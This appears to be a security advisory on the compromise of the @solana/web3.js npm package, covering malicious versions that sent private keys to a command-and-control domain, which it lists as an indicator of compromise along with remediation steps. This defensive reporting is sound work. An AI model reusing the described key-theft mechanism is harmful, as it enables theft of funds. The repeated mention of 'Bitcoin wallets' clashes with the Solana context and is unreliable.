Analysis Summary

A software supply chain attack against the well-known @solana/web3.js npm package has been reported by cybersecurity researchers. The attack involved the distribution of two malicious versions that might grab users' private keys and use them to empty their Bitcoin wallets.

Versions 1.95.6 and 1.95.7 are vulnerable to the attack. The npm registry no longer offers these two versions for download. With over 400,000 downloads every week, the package is popular. Malicious code that has been introduced into these compromised versions is intended to steal private keys from gullible developers and users, potentially allowing attackers to empty Bitcoin wallets.

The npm package called @solana/web3.js can be used to communicate with the Solana JavaScript SDK, which is used to create web apps and Node.js applications. Security researchers say that the backdoor included in version 1.95.7 adds a function called "addToQueue" that exfiltrates the private key by using what appear to be authentic CloudFlare headers. Calls to this function are then injected in other locations that have legitimate access to the private key.

The keys are exfiltrated to a command-and-control (C2) server ("sol-rpc[.]xyz"), which is presently unavailable. On November 22, 2024, it was registered with NameSilo, a domain registrar. It is believed that the npm package maintainers were the targets of a phishing attack, which gave the threat actors access to the accounts and enabled them to release the rogue versions.

Solana dApps frequently use the JavaScript library @solana/web3.js, whose publish-access account was stolen. This enabled an attacker to release malicious and unauthorized packages that were altered, which enabled them to steal private key content and deplete funds from dApps that deal directly with private keys, such as bots. This problem shouldn't impact non-custodial wallets because they typically don't reveal private keys during transactions.

The developers added that the incident primarily affects projects that were changed between 3:20 and 8:25 p.m. UTC on December 2, 2024, and that directly handle private keys. It is recommended that users who depend on @solana/web3.js update to the most recent version as soon as feasible. If they believe their authority keys may be compromised, they can also choose to rotate them.

Impact

• Sensitive Data Theft
• Cryptocurrency Theft
• Financial Loss
• Data Exfiltration

Indicators of Compromise

Domain Name

• sol-rpc.xyz

Remediation

• Users should update to the latest version as soon as possible.
• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Enable antivirus and anti-malware software and update signature definitions promptly. Using multi-layered protection is necessary to secure vulnerable assets.
• Patch and upgrade any platforms and software on time and make it into a standard security policy.
• Employ network intrusion detection and prevention systems to monitor and block malicious network activities.
• Implement network segmentation to limit lateral movement for attackers within the network.
• Implement advanced email filtering to detect and block phishing emails.
• Employ updated and robust endpoint protection solutions to detect and block malware.
• Develop and test an incident response plan to ensure a swift and effective response to security incidents.
• Enhance logging and monitoring capabilities to detect anomalous activities and unauthorized access.
• Conduct regular security audits and penetration testing to identify and address potential vulnerabilities.
• Regularly back up critical data and ensure that backup and recovery procedures are in place.
• Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.